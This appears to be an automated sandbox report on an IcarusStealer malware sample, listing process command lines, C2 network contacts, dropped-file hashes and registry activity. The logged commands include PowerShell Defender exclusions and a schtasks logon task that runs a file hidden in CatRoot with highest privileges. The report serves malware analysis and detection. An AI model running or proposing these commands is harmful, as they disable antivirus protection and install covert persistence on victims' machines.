powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp2156.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\System32\CatRoot\$SXR\$SXR.exe

"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 keyauth.win udp
US 104.26.1.5:443 keyauth.win tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.184:80 apps.identrust.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 x2.c.lencr.org udp
US 8.8.8.8:53 case-shield.gl.at.ply.gg udp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
GB 173.222.13.40:80 x2.c.lencr.org tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 104.26.1.5:443 keyauth.win tcp
N/A 127.0.0.1:49220 tcp
N/A 127.0.0.1:49222 tcp
N/A 127.0.0.1:49282 tcp
N/A 127.0.0.1:49284 tcp
US 8.8.8.8:53 operating-noble.gl.at.ply.gg udp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp

Files

\Users\Admin\AppData\Local\Temp\Client.exe

MD5 41bb20a321d77b2bdf96ba74783feca8
SHA1 61eac12659e5141463acdc36b3b42bb12e32a18c
SHA256 80b30d39834f87a48c64f252a706d4a107ee3b83df3d5bc440fe303af4ffd529
SHA512 b3ae8cfda4b66e18202645aad37204f742c20ff2fb89cd84b8ad7cd6c728f4cc2d621d77d34b6acc556f27bd9c969aef979a0e37e9be70c1d4b62da73dad5923

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 9da00b6427a91d73de0f7b20df26b849
SHA1 724a547b8e4edc340c2ae53a15f3ed156d44287f
SHA256 ea298f0bdc32ef49b4ebe551276ff229079bc78b216bd8df8879dfdb8b01edcd
SHA512 10532d4e04ffbeaf6767398208df5f7b75470590e2eb35a551b3c6cf06c24d67bd382e59f929be7cf8d1c5e94089d4979b9bff8b833b2bb6a2a7bb73f9afdb7b

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 2f3e6e8955ea526e9dda7ab10414840f
SHA1 0027f0db042ecb3d6c59e4b7ff2a605cda38ffb5
SHA256 25f1407aa290e3a2a90eec56dc6c531fb13a7e43bd9a33016c7f677a6447923b
SHA512 98a4c6dc610c891be99889595e098f05d8f79c8fc0f1691d0a2a35efd4656f13b3a78f73576ac3e1e20676ceefcb6216dd3cbde934eeef7fee23d591a1b74173

memory/2700-9-0x0000000000B40000-0x0000000001180000-memory.dmp

memory/2700-10-0x0000000074590000-0x0000000074C7E000-memory.dmp

\Users\Admin\AppData\Local\Temp\switched.exe

MD5 b9bbe31d276de5c3d05352d070ae4244
SHA1 5e1bb67b01c579b4e0ad5a7475ceb657201c27ec
SHA256 a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d
SHA512 0a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

MD5 ceb8c3c0f2249f05f3df8f88d46ae743
SHA1 651675ba157c085ce64aa5bb2abbfd6f5efc75c6
SHA256 a047b5971bf32a48532d2dc9276f3f1208ebaa6ac2efe650bd827344fe86b778
SHA512 872d88e2306b40567ec28bb96875fa91a37425e36ad8264a20ba9a29c4552a090fd6336747e7f65056203ce29fedab600aa51684fa525c5417be484bc6b1766a

memory/2996-22-0x0000000003340000-0x000000000377C000-memory.dmp

memory/2640-23-0x000000013FE10000-0x000000014024C000-memory.dmp

\Users\Admin\AppData\Local\Temp\tesetey.exe

MD5 0f0838bc6642dd6bc603368e50b4aba3
SHA1 932bd4d1c11996bf8ac3ac74a94b266e96d44c36
SHA256 4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9
SHA512 a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

memory/2624-29-0x0000000000BF0000-0x0000000000C72000-memory.dmp

memory/2624-31-0x0000000074590000-0x0000000074C7E000-memory.dmp

memory/2624-32-0x0000000004B40000-0x0000000004B80000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\p2cglymc\p2cglymc.cmdline

MD5 80a1cd1a299b50a00281726b2a5f1295
SHA1 b19f6469acfd5f7c09ed93cf0e653e1b6f0c6428
SHA256 30b41329ac56ec4c179b8c2101a6c2b0db0a3b00843afcd54670aab4de64674c
SHA512 c7b4b5fc819fe3962762631f2675db7cf0b78994b6e29ce706eade107f21e834f5a4c5abc4c5e197b4bd42f0171b679fb02f5d22df874bf0422f82d0a4f4f510

\??\c:\Users\Admin\AppData\Local\Temp\p2cglymc\p2cglymc.0.cs

MD5 14846c9faaef9299a1bf17730f20e4e6
SHA1 8083da995cfaa0e8e469780e32fcff1747850eb6
SHA256 61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b
SHA512 549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

C:\Users\Admin\AppData\Local\Temp\RESE43.tmp

MD5 c1187374035c9c044ef03a6cac62d2e8
SHA1 b5ad05e6966e248207af70f51fa076b3f19ce4e2
SHA256 1e112fe7d3103f685b5b059b05e688289a0acc3d50473eb91dd3fe567ad45ca0
SHA512 105463bd65b3c274c1d38583b1d9c68fb87e02ee575190346fb71f278f1dfc241fc6e880291f6cf66a520951e4c10ec408071a0437bb8f03c31ddf72eb5c7f2d

memory/1032-47-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1032-45-0x0000000000400000-0x0000000000424000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\CSCD620E4CA7FE54156A29ED1C9529AF5DF.TMP

MD5 1d5543c367c49b9dd6366270fdd4ee3a
SHA1 bf1e4c9b270125c4fd6fba63cf9fa92c5b3b8e66
SHA256 502b03046eea75f154cee0da9adfb6ca501704b97ef7ac5053de8f0f9f92d4d2
SHA512 86c864acdf3b4b457128889d37d6aad9190c53be059f30c7975adc7966c1aaa0b695ed22599aa5f63b2e44c8f5411f861db08b20c9909f4b934c852f064efa04

memory/1032-49-0x0000000000400000-0x0000000000424000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\YourPhone.exe

MD5 5c13f91965d83fb112657fce83f48802
SHA1 0cbde19c106427cc4edd6a2423cd79b30764632d
SHA256 d61ad762cbe5d931208412f2e825c486b0e7cf7b0e5278f0ad86fc60dc6d1477
SHA512 ba2773a39fb0b54847c745fc425f80feccad5af0e0fadcda2c7f9eb327756434356ef86c38b067de837fc7e3da785101cc3f7caad5c107820b3eea75bb4637c1

memory/1032-50-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1032-56-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1032-51-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1032-60-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1032-58-0x0000000000400000-0x0000000000424000-memory.dmp

memory/804-61-0x0000000001180000-0x0000000001188000-memory.dmp

memory/1032-63-0x0000000004A60000-0x0000000004AA0000-memory.dmp

memory/1032-64-0x0000000074590000-0x0000000074C7E000-memory.dmp

memory/804-62-0x000007FEF56F0000-0x000007FEF60DC000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\63QG9ZJUK59TQIGBF1C6.temp

MD5 e5cd928526289a221212a39a5a8abb24
SHA1 5bd1e28c75e0e5f66eada1cd9fa5da7382dbc2cb
SHA256 4196635fd53050d3229f1299a3034b015b4274c474b953bd7b9de31f7ba9bfa0
SHA512 ac46fe719e601468ff0a5527ad071a92f8c03669513d9e5d2ecef9a143768fee1e92652d64c9c2fc9a008c04877f71a619616eb946a3fe04c48b1d380bab9885

memory/1256-72-0x000000006EF10000-0x000000006F4BB000-memory.dmp

memory/616-73-0x000000006EF10000-0x000000006F4BB000-memory.dmp

memory/616-74-0x0000000002B10000-0x0000000002B50000-memory.dmp

memory/1256-75-0x000000006EF10000-0x000000006F4BB000-memory.dmp

memory/616-76-0x000000006EF10000-0x000000006F4BB000-memory.dmp

memory/1256-77-0x0000000002D80000-0x0000000002DC0000-memory.dmp

memory/616-78-0x0000000002B10000-0x0000000002B50000-memory.dmp

memory/1256-79-0x0000000002D80000-0x0000000002DC0000-memory.dmp

memory/616-80-0x0000000002B10000-0x0000000002B50000-memory.dmp

memory/2700-81-0x00000000009A0000-0x00000000009E0000-memory.dmp

memory/804-82-0x000000001AE50000-0x000000001AED0000-memory.dmp

memory/1256-83-0x000000006EF10000-0x000000006F4BB000-memory.dmp

memory/616-84-0x000000006EF10000-0x000000006F4BB000-memory.dmp

memory/2624-85-0x0000000074590000-0x0000000074C7E000-memory.dmp

C:\Windows\System32\catroot\$SXR\$SXR.exe

MD5 4bd5a0408b3ce5efe4d2aad0c141154d
SHA1 64cfb6af044f175ec76176d284e66f24c4063e6c
SHA256 663b90b0a72843dddc51e070fcb7b2ab26f56cc2e86ef9b832604a271dff411a
SHA512 6ab297fd299023c80a7568b8bd74230022c024b6ebdd0e2abf84d036c6f967c6027e5646962475cfb9e8ff5306cb83e0c892ad39816be00f839b398a9415dbb0

C:\Users\Admin\AppData\Local\Temp\tmp2156.tmp.bat

MD5 01965b3e40047eadca92b1344a4d1ba8
SHA1 dab8c443348f3f9e8df0994ed38a8e9ba74690c0
SHA256 33b88d16bba3c6acc31d0c70fcf08e5721039c64e49b68178b9bfed48d9ced96
SHA512 bd2cb6a7ca2af430df74d5deb9f6aa193b68f747a6c029e1549d79cc9b5637bea6463027f950604de3aefba52ebd8763611723be9cde5cf671e261716057355e

memory/2700-96-0x0000000074590000-0x0000000074C7E000-memory.dmp

memory/108-98-0x0000000003E90000-0x0000000003E91000-memory.dmp

\Windows\System32\catroot\$SXR\$SXR.exe

MD5 95ca16db3c6ffe18f678246226235a32
SHA1 d358bdaa55d5878fa90d8272ec3676116e85018a
SHA256 dbcb6bff7d4bab19d17321cf41e8359ea6e2ef13498bf6c98bc72f7614ff22ad
SHA512 e41a6ea1e007423586ef194c80b07fc6d4c0b113a3d6740ba6e1b9dcbf18ae9784dc899e153d7a6f9c74251624a713fb63fd1cb70f3a64594bd00b90e74a0bca

C:\Windows\System32\catroot\$SXR\$SXR.exe

MD5 30111650408e0c92181d4fd8aedf75bf
SHA1 c372699a0023f2320fbabc9f0fc10c4d88213b50
SHA256 eb8fb3cce486be08859bb996b81bdeb037602601400dcfcc28fe69db5c4af8f4
SHA512 0d9f8e68c7ddc97941fd5fd4951d439cbfd0cf434b3814ac0ee8aff3a066da617320a6c96e41478c50d4ce96fa3d7c44af40e98e89982d3f2672eb6c996cd5b3

memory/604-103-0x0000000074590000-0x0000000074C7E000-memory.dmp

memory/604-102-0x0000000001090000-0x00000000016D0000-memory.dmp

C:\Windows\System32\CatRoot\$SXR\$SXR.exe

MD5 899b39e1c1dc74440135ff584160cced
SHA1 673bd63287f722db94f64e77b72661cf38a35353
SHA256 3bdc087d9c937d6c51baf06d01b4107a0a62cd94a53c3ac7a43bbcedfb776403
SHA512 71c070262b0433890c0553ab7613418af37ac3390e5771372852dacfc5ec6b7de8880e7b76e24a5e517711cb9ae01123800a6171ce9fe36eda00452119510a3e

memory/2640-104-0x000000013FE10000-0x000000014024C000-memory.dmp

memory/604-105-0x0000000000630000-0x0000000000670000-memory.dmp

C:\Windows\System32\CatRoot\$SXR\Read.txt

MD5 79668a6729f0f219835c62c9e43b7927
SHA1 0cbbc7cc8dbd27923b18285960640f3dad96d146
SHA256 6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e
SHA512 bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3

memory/804-108-0x000007FEF56F0000-0x000007FEF60DC000-memory.dmp

memory/1032-109-0x0000000004A60000-0x0000000004AA0000-memory.dmp

memory/1032-110-0x0000000074590000-0x0000000074C7E000-memory.dmp

memory/804-111-0x000000001AE50000-0x000000001AED0000-memory.dmp

memory/108-112-0x0000000003E90000-0x0000000003E91000-memory.dmp

memory/604-113-0x0000000074590000-0x0000000074C7E000-memory.dmp

memory/604-114-0x0000000000630000-0x0000000000670000-memory.dmp

memory/108-119-0x0000000002A00000-0x0000000002A10000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-14 17:35

Reported

2024-03-14 17:43

Platform

win10v2004-20231215-en

Max time kernel

450s

Max time network

450s

Command Line

"C:\Users\Admin\AppData\Local\Temp\custom1.exe"

Signatures

IcarusStealer

stealer icarusstealer

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\custom1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\switched.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\switched.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Windows\System32\CatRoot\$SXR\$SXR.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\CatRoot\$SXR\Read.txt C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
File created C:\Windows\System32\CatRoot\$SXR\$SXR.exe C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
File opened for modification C:\Windows\System32\CatRoot\$SXR\$SXR.exe C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
File opened for modification C:\Windows\System32\CatRoot\$SXR\Read.txt C:\Windows\System32\CatRoot\$SXR\$SXR.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 992 set thread context of 844 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
